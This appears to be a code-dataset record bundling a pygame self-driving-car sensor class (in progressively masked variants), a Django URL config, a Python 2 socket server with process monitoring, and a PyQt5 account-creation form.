"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n\n def update(self):\n \"\"\"Updates the car itself\"\"\"\n self.distance += self.speed\n self.x_pos += math.cos(math.radians(360 - self.angle)) * self.speed\n self.y_pos += math.sin(math.radians(360 - self.angle)) * self.speed\n self.center = [int(self.x_pos + 50), int(self.y_pos + 50)]\n self.rotate_surface = rotate(self.surface, self.angle)\n self.update_collision_points()\n self.check_collision()\n self.radars.clear()\n sensoresList = []\n if int(os.getenv('NUM_SENSORES')) == 3:\n sensoresList = list(range(-90, 120, 90))\n elif int(os.getenv('NUM_SENSORES')) == 4:\n sensoresList = list(range(-90, 120, 60))\n elif int(os.getenv('NUM_SENSORES')) == 5:\n sensoresList = list(range(-90, 120, 45))\n elif int(os.getenv('NUM_SENSORES')) == 9:\n sensoresList = list(range(-90, 120, 25))\n elif int(os.getenv('NUM_SENSORES')) == 11:\n sensoresList = list(range(-90, 120, 20))\n for degree in sensoresList:\n self.update_radar(degree)\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its list\"\"\"\n length = 0\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n while pixel != WHITE_COLOR and length < 300:\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n else:\n length = length + 1\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n distance = int(math.sqrt(horizontal + vertical))\n self.radars.append([(x_len, y_len), distance])\n\n def draw_radar(self, screen):\n \"\"\"Draws the radars on the screen\"\"\"\n self.get_data()\n for radar in self.radars:\n position, _ = radar\n pg.draw.line(screen, RADAR_COLOR, self.center, position, 1)\n pg.draw.circle(screen, RADAR_COLOR, position, 2)\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n\n def check_collision(self):\n \"\"\"Checks if one of the collision points of the car is a white pixel\n which if it is, means it got out of the track\"\"\"\n self.collided = False\n for point in self.collision_points:\n try:\n if self.game_map.get_at((int(point[0]), int(point[1]))\n ) == WHITE_COLOR:\n self.collided = True\n break\n except:\n self.collided = True\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n\n def get_reward(self):\n return 
self.distance / 50.0\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n\n def update(self):\n \"\"\"Updates the car itself\"\"\"\n self.distance += self.speed\n self.x_pos += math.cos(math.radians(360 - self.angle)) * self.speed\n self.y_pos += math.sin(math.radians(360 - self.angle)) * self.speed\n self.center = [int(self.x_pos + 50), int(self.y_pos + 50)]\n self.rotate_surface = rotate(self.surface, self.angle)\n self.update_collision_points()\n self.check_collision()\n self.radars.clear()\n sensoresList = []\n if int(os.getenv('NUM_SENSORES')) == 3:\n sensoresList = list(range(-90, 120, 90))\n elif int(os.getenv('NUM_SENSORES')) == 4:\n sensoresList = list(range(-90, 120, 60))\n elif int(os.getenv('NUM_SENSORES')) == 5:\n sensoresList = list(range(-90, 120, 45))\n elif int(os.getenv('NUM_SENSORES')) == 9:\n sensoresList = list(range(-90, 120, 25))\n elif int(os.getenv('NUM_SENSORES')) == 11:\n sensoresList = list(range(-90, 120, 20))\n for degree in sensoresList:\n self.update_radar(degree)\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its list\"\"\"\n length = 0\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n while pixel != WHITE_COLOR and length < 300:\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n else:\n length = length + 1\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n distance = int(math.sqrt(horizontal + vertical))\n self.radars.append([(x_len, y_len), distance])\n <function token>\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n\n def check_collision(self):\n \"\"\"Checks if one of the collision points of the car is a white pixel\n which if it is, means it got out of the track\"\"\"\n self.collided = False\n for point in self.collision_points:\n try:\n if self.game_map.get_at((int(point[0]), int(point[1]))\n ) == WHITE_COLOR:\n self.collided = True\n break\n except:\n self.collided = True\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n\n def get_reward(self):\n return self.distance / 50.0\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n <function token>\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its list\"\"\"\n length = 0\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n while pixel != WHITE_COLOR and length < 300:\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n else:\n length = length + 1\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n distance = int(math.sqrt(horizontal + vertical))\n self.radars.append([(x_len, y_len), distance])\n <function token>\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n\n def check_collision(self):\n \"\"\"Checks if one of the collision points of the car is a white pixel\n which if it is, means it got out of the track\"\"\"\n self.collided = False\n for point in self.collision_points:\n try:\n if self.game_map.get_at((int(point[0]), int(point[1]))\n ) == WHITE_COLOR:\n self.collided = True\n break\n except:\n self.collided = True\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n\n def get_reward(self):\n return self.distance / 50.0\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n <function token>\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its list\"\"\"\n length = 0\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n while pixel != WHITE_COLOR and length < 300:\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n else:\n length = length + 1\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n distance = int(math.sqrt(horizontal + vertical))\n self.radars.append([(x_len, y_len), distance])\n <function token>\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n\n def check_collision(self):\n \"\"\"Checks if one of the collision points of the car is a white pixel\n which if it is, means it got out of the track\"\"\"\n self.collided = False\n for point in self.collision_points:\n try:\n if self.game_map.get_at((int(point[0]), int(point[1]))\n ) == WHITE_COLOR:\n self.collided = True\n break\n except:\n self.collided = True\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n <function token>\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n <function token>\n\n def update_radar(self, degree):\n \"\"\"Updates the car radars and appends them to its list\"\"\"\n length = 0\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n while pixel != WHITE_COLOR and length < 300:\n try:\n pixel = self.game_map.get_at((x_len, y_len))\n except IndexError:\n pixel = WHITE_COLOR\n else:\n length = length + 1\n x_len = int(self.center[0] + math.cos(math.radians(360 - (self.\n angle + degree))) * length)\n y_len = int(self.center[1] + math.sin(math.radians(360 - (self.\n angle + degree))) * length)\n horizontal = math.pow(x_len - self.center[0], 2)\n vertical = math.pow(y_len - self.center[1], 2)\n distance = int(math.sqrt(horizontal + vertical))\n self.radars.append([(x_len, y_len), distance])\n <function token>\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n <function token>\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n <function token>\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n\n def draw(self, screen):\n \"\"\"Renders the car intro the screen\"\"\"\n screen.blit(self.rotate_surface, [self.x_pos, self.y_pos])\n self.draw_radar(screen)\n <function token>\n <function token>\n <function token>\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n <function token>\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n <function token>\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n <function token>\n <function token>\n <function token>\n <function token>\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n <function token>\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n <function token>\n\n def get_data(self):\n inputLayer = []\n for i in range(int(os.getenv('NUM_SENSORES'))):\n inputLayer.append(0)\n for i, radar in enumerate(self.radars):\n inputLayer[i] = int(radar[1] / 30)\n return inputLayer\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n\n def __init__(self, game_map):\n self.game_map = game_map\n self.surface = pg.image.load('red_car.png')\n self.surface = pg.transform.scale(self.surface, (CAR_WIDTH, CAR_HEIGHT)\n )\n self.rotate_surface = self.surface\n self.x_pos = 600\n self.y_pos = 655\n self.angle = 0\n self.speed = 7\n self.distance = 0\n self.collided = False\n self.collision_points = []\n self.radars = []\n self.center = [self.x_pos + 50, self.y_pos + 50]\n <function token>\n <function token>\n <function token>\n <function token>\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n <function token>\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n <function token>\n <function token>\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def update_collision_points(self):\n \"\"\"Calls for calc_sides method in order to get the sides of the car\"\"\"\n self.collision_points = calc_sides(self.center, self.angle)\n <function token>\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n <function token>\n <function token>\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def get_collided(self):\n \"\"\"Returns if the car has collided or not\"\"\"\n return self.collided\n <function token>\n <function token>\n",
"<import token>\n<assignment token>\n<code token>\n\n\nclass Car(object):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<import token>\n<assignment token>\n<code token>\n<class token>\n"
] | false |
99,835 | 8e9e7811824477304231a393c7dc23d54bf526ad | #! python3
# minimum_cost_arborescence.py
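# V, E, r: presumably the number of vertices, number of edges, and the root vertex of the arborescence instance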
V, E, r = list(map(int, input().split(' ')))
| [
"#! python3\n# minimum_cost_arborescence.py\n\nV, E, r = list(map(int, input().split(' ')))\n",
"V, E, r = list(map(int, input().split(' ')))\n",
"<assignment token>\n"
] | false |
99,836 | 03d683cce858817b2e8e42afcdf2bafb78437580 | import autocomplete_light
autocomplete_light.autodiscover()
from django.conf.urls import patterns, include
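# mount autocomplete_light's bundled URLconf under the /autocomplete/ prefix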
urlpatterns = patterns(
'',
(r'^autocomplete/', include('autocomplete_light.urls')),
)
| [
"import autocomplete_light\nautocomplete_light.autodiscover()\n\nfrom django.conf.urls import patterns, include\n\nurlpatterns = patterns(\n '',\n (r'^autocomplete/', include('autocomplete_light.urls')),\n)\n",
"import autocomplete_light\nautocomplete_light.autodiscover()\nfrom django.conf.urls import patterns, include\nurlpatterns = patterns('', ('^autocomplete/', include(\n 'autocomplete_light.urls')))\n",
"<import token>\nautocomplete_light.autodiscover()\n<import token>\nurlpatterns = patterns('', ('^autocomplete/', include(\n 'autocomplete_light.urls')))\n",
"<import token>\nautocomplete_light.autodiscover()\n<import token>\n<assignment token>\n",
"<import token>\n<code token>\n<import token>\n<assignment token>\n"
] | false |
99,837 | 7d23c92e4a434b15dbbe140d99490d05c160dc1b | # -*- coding: UTF-8 -*-
import Queue
import multiprocessing
import M6.Common.Protocol.Socket as Socket
import time
from ServerConf import ServerConf
from MoniterServer import MoniterServer
from ManagerServer import ManagerServer
__all__ = ['Server']
class Server():
def __init__(self, server_port, monitor_port, daemon_process, param=None,
max_process=3, process_time_out=-1, server_name=None):
"""
        @param server_port: running server port
        @param monitor_port: process monitor port
        @param daemon_process: running process module
        @param param: parameter passed to daemon_process
        @param max_process: number of simultaneously running processes
        @param process_time_out: process timeout
                                 (used as the join parameter for the process)
                                 < 0: (Default) wait until the process ends
                                 = 0: do not join
                                 > 0: wait time
                                 WARNING -todo...-
        @param server_name: server name shown in the monitor
                            None: (Default) use the class name taken from daemon_process
"""
#Use ManagerServer
self.daemon_process = daemon_process
self.socket_queue = Queue.Queue()
self.param = param
#Use MoniterServer
self.monitor_dic = multiprocessing.Manager().dict()
if server_name is None:
server_name = daemon_process.__name__
#Setup Server Conf
self.conf = ServerConf(server_port, monitor_port,
server_name, max_process, process_time_out)
def run(self):
#start monitor
if self.conf.get_monitor_port() != 0:
monitor_server = MoniterServer(self.conf, self.monitor_dic, self.socket_queue)
monitor_server.setDaemon(True)
monitor_server.start()
#start process manager
manager_server = ManagerServer(self.conf, self.socket_queue, self.monitor_dic,
self.daemon_process, self.param)
manager_server.setDaemon(True)
manager_server.start()
self.sock = Socket.Socket()
self.sock.Bind(self.conf.get_server_port())
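        # accept clients forever; each accepted socket is queued for ManagerServer to dispatch to daemon_process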
while True:
client_sock = self.sock.Accept()
if not client_sock:
break
print 'put', time.time()
self.socket_queue.put(client_sock)
if __name__ == '__main__':
class Test():
def __init__(self, socket, monitor, param):
import os
monitor.set_start_time('111111')
monitor.set_pid(os.getpid())
def run(self):
import time
time.sleep(5)
pass
#def __init__(self, server_port, monitor_port, daemon_process, param=None,
# max_process=3, process_time_out=-1, server_name=None):
Server(5001, 5002, Test, 'TestClass',
1, -1, None).run()
| [
"# -*- coding: UTF-8 -*-\nimport Queue\nimport multiprocessing\nimport M6.Common.Protocol.Socket as Socket\nimport time\n\nfrom ServerConf import ServerConf\nfrom MoniterServer import MoniterServer\nfrom ManagerServer import ManagerServer\n\n__all__ = ['Server']\n\nclass Server():\n def __init__(self, server_port, monitor_port, daemon_process, param=None,\n max_process=3, process_time_out=-1, server_name=None):\n \"\"\"\n @param server_port: running server port\n @param monitor_port: process moniter port\n @param daemon_process: running process module\n @param param: parameter use at daemon_process\n @param max_process: number of simutaneously runing process\n @prarm process_time_out: number of process time out\n (process의 join parameter로 사용)\n < 0: (Default) when ending until\n = 0: not join\n > 0: wait time\n WARNING -todo...-\n @param server_name: monitmoniter에 표시할 server이름\n None: (Default) daemon_process에서 class이름을 확인하여 사용\n \"\"\"\n\n #Use ManagerServer\n self.daemon_process = daemon_process\n self.socket_queue = Queue.Queue()\n self.param = param\n\n #Use MoniterServer\n self.monitor_dic = multiprocessing.Manager().dict()\n\n if server_name is None:\n server_name = daemon_process.__name__\n\n #Setup Server Conf\n self.conf = ServerConf(server_port, monitor_port,\n server_name, max_process, process_time_out)\n\n def run(self):\n #start monitor\n if self.conf.get_monitor_port() != 0:\n monitor_server = MoniterServer(self.conf, self.monitor_dic, self.socket_queue)\n monitor_server.setDaemon(True)\n monitor_server.start()\n\n #start process manager\n manager_server = ManagerServer(self.conf, self.socket_queue, self.monitor_dic,\n self.daemon_process, self.param)\n manager_server.setDaemon(True)\n manager_server.start()\n\n self.sock = Socket.Socket()\n self.sock.Bind(self.conf.get_server_port())\n while True:\n client_sock = self.sock.Accept()\n if not client_sock:\n break\n\n print 'put', time.time()\n self.socket_queue.put(client_sock)\n\nif __name__ == '__main__':\n class Test():\n def __init__(self, socket, monitor, param):\n import os\n monitor.set_start_time('111111')\n monitor.set_pid(os.getpid())\n\n def run(self):\n import time\n time.sleep(5)\n pass\n\n #def __init__(self, server_port, monitor_port, daemon_process, param=None,\n # max_process=3, process_time_out=-1, server_name=None):\n Server(5001, 5002, Test, 'TestClass', \n 1, -1, None).run()\n"
] | true |
99,838 | eb88c36500f857d47ef7e38641b9dcb47e9ad35e | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'createaccount.ui'
#
# Created by: PyQt5 UI code generator 5.14.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_createaccount(object):
def setupUi(self, createaccount):
createaccount.setObjectName("createaccount")
createaccount.resize(800, 600)
self.centralwidget = QtWidgets.QWidget(createaccount)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout.setObjectName("verticalLayout")
self.widget_2 = QtWidgets.QWidget(self.centralwidget)
self.widget_2.setStyleSheet("")
self.widget_2.setObjectName("widget_2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.widget_2)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.widget_3 = QtWidgets.QWidget(self.widget_2)
self.widget_3.setObjectName("widget_3")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.widget_3)
self.horizontalLayout.setObjectName("horizontalLayout")
self.userlabel = QtWidgets.QLabel(self.widget_3)
font = QtGui.QFont()
font.setFamily("微軟正黑體")
font.setPointSize(28)
self.userlabel.setFont(font)
self.userlabel.setObjectName("userlabel")
self.horizontalLayout.addWidget(self.userlabel)
self.userlineEdit = QtWidgets.QLineEdit(self.widget_3)
self.userlineEdit.setMinimumSize(QtCore.QSize(300, 30))
font = QtGui.QFont()
font.setPointSize(16)
self.userlineEdit.setFont(font)
self.userlineEdit.setStyleSheet("border-radius:15px;")
self.userlineEdit.setText("")
self.userlineEdit.setObjectName("userlineEdit")
self.horizontalLayout.addWidget(self.userlineEdit)
self.verticalLayout_2.addWidget(self.widget_3, 0, QtCore.Qt.AlignHCenter)
self.widget_4 = QtWidgets.QWidget(self.widget_2)
self.widget_4.setObjectName("widget_4")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.widget_4)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.passwordlabel = QtWidgets.QLabel(self.widget_4)
font = QtGui.QFont()
font.setFamily("微軟正黑體")
font.setPointSize(28)
self.passwordlabel.setFont(font)
self.passwordlabel.setObjectName("passwordlabel")
self.horizontalLayout_2.addWidget(self.passwordlabel)
self.passwordlineEdit = QtWidgets.QLineEdit(self.widget_4)
self.passwordlineEdit.setMinimumSize(QtCore.QSize(300, 30))
font = QtGui.QFont()
font.setPointSize(16)
self.passwordlineEdit.setFont(font)
self.passwordlineEdit.setStyleSheet("border-radius:15px;")
self.passwordlineEdit.setEchoMode(QtWidgets.QLineEdit.Password)
self.passwordlineEdit.setObjectName("passwordlineEdit")
self.horizontalLayout_2.addWidget(self.passwordlineEdit)
self.verticalLayout_2.addWidget(self.widget_4, 0, QtCore.Qt.AlignHCenter)
self.widget = QtWidgets.QWidget(self.widget_2)
self.widget.setObjectName("widget")
self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.widget)
self.horizontalLayout_3.setContentsMargins(-1, -1, 82, -1)
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.confirmpasswordlabel = QtWidgets.QLabel(self.widget)
font = QtGui.QFont()
font.setFamily("微軟正黑體")
font.setPointSize(28)
self.confirmpasswordlabel.setFont(font)
self.confirmpasswordlabel.setObjectName("confirmpasswordlabel")
self.horizontalLayout_3.addWidget(self.confirmpasswordlabel)
self.confirmpasswordlineEdit = QtWidgets.QLineEdit(self.widget)
self.confirmpasswordlineEdit.setMinimumSize(QtCore.QSize(300, 30))
font = QtGui.QFont()
font.setPointSize(16)
self.confirmpasswordlineEdit.setFont(font)
self.confirmpasswordlineEdit.setStyleSheet("border-radius:15px;")
self.confirmpasswordlineEdit.setEchoMode(QtWidgets.QLineEdit.Password)
self.confirmpasswordlineEdit.setObjectName("confirmpasswordlineEdit")
self.horizontalLayout_3.addWidget(self.confirmpasswordlineEdit)
self.verticalLayout_2.addWidget(self.widget, 0, QtCore.Qt.AlignHCenter)
self.verticalLayout.addWidget(self.widget_2)
self.widget_5 = QtWidgets.QWidget(self.centralwidget)
self.widget_5.setStyleSheet("color:rgb(255, 255, 255)")
self.widget_5.setObjectName("widget_5")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.widget_5)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.confirmpushButton = QtWidgets.QPushButton(self.widget_5)
self.confirmpushButton.setMinimumSize(QtCore.QSize(200, 60))
font = QtGui.QFont()
font.setPointSize(20)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.confirmpushButton.setFont(font)
self.confirmpushButton.setStyleSheet("border-color: rgb(255, 255, 255);\n"
"background-color: rgb(255, 255, 255,100);\n"
"border-radius:15px;\n"
"font: 20pt;")
self.confirmpushButton.setObjectName("confirmpushButton")
self.verticalLayout_3.addWidget(self.confirmpushButton, 0, QtCore.Qt.AlignRight)
self.cancelpushButton = QtWidgets.QPushButton(self.widget_5)
self.cancelpushButton.setMinimumSize(QtCore.QSize(200, 60))
font = QtGui.QFont()
font.setPointSize(20)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.cancelpushButton.setFont(font)
self.cancelpushButton.setStyleSheet("border-color: rgb(255, 255, 255);\n"
"background-color: rgb(255, 255, 255,100);\n"
"border-radius:15px;\n"
"font: 20pt;")
self.cancelpushButton.setObjectName("cancelpushButton")
self.verticalLayout_3.addWidget(self.cancelpushButton, 0, QtCore.Qt.AlignRight)
self.verticalLayout.addWidget(self.widget_5)
createaccount.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(createaccount)
self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21))
self.menubar.setObjectName("menubar")
createaccount.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(createaccount)
self.statusbar.setObjectName("statusbar")
createaccount.setStatusBar(self.statusbar)
self.retranslateUi(createaccount)
QtCore.QMetaObject.connectSlotsByName(createaccount)
def retranslateUi(self, createaccount):
_translate = QtCore.QCoreApplication.translate
createaccount.setWindowTitle(_translate("createaccount", "MainWindow"))
self.userlabel.setText(_translate("createaccount", "<html><head/><body><p><span style=\" color:#ffffff;\">帳號:</span></p></body></html>"))
self.passwordlabel.setText(_translate("createaccount", "<html><head/><body><p><span style=\" color:#ffffff;\">密碼:</span></p></body></html>"))
self.confirmpasswordlabel.setText(_translate("createaccount", "<html><head/><body><p><span style=\" color:#ffffff;\">確認密碼:</span></p></body></html>"))
self.confirmpushButton.setText(_translate("createaccount", "確認"))
self.cancelpushButton.setText(_translate("createaccount", "取消"))
| [
